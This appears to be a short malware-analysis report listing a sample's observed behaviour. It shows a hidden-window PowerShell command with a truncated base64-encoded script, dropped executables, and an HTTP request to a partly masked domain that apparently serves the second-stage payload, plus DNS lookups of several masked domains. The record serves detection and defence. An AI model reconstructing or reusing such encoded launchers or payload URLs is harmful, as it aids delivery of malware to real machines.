Technical information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABXAHoAcAB0AGUAcABvAG4AcgA9ACcAQQB6AHIAaABsAHkAbQBwAHMAJwA7ACQAUgBvAGgAdgBtAHoAbgBxAHAAbAAgAD0AIAAnADEANgAwACcAOwAkAEIAaAByAHgAbwBpAGQAZABpAHUAYwA9ACcAWgBrAGsAaABwAGQAdQBzACcAOwA...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1980
- %TEMP%\851718.cvr
- %HOMEPATH%\160.exe
- %HOMEPATH%\160.exe
- 'sa####patil.online':80
- http://sa####patil.online/wp-includes/rBhbqf/
- DNS ASK sa####patil.online
- DNS ASK de###.#utostar.com.sa
- DNS ASK ac#####emagicsjacks.xyz
- DNS ASK he###ghao.club
- DNS ASK re###at.club
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABXAHoAcAB0AGUAcABvAG4AcgA9ACcAQQB6AHIAaABsAHkAbQBwAHMAJwA7ACQAUgBvAGgAdgBtAHoAbgBxAHAAbAAgAD0AIAAnADEANgAwACcAOwAkAEIAaAByAHgAbwBpAGQAZABpAHUAYwA9ACcAWgBrAGsAaABwAGQAdQBzACcAOwA...' (with a hidden window)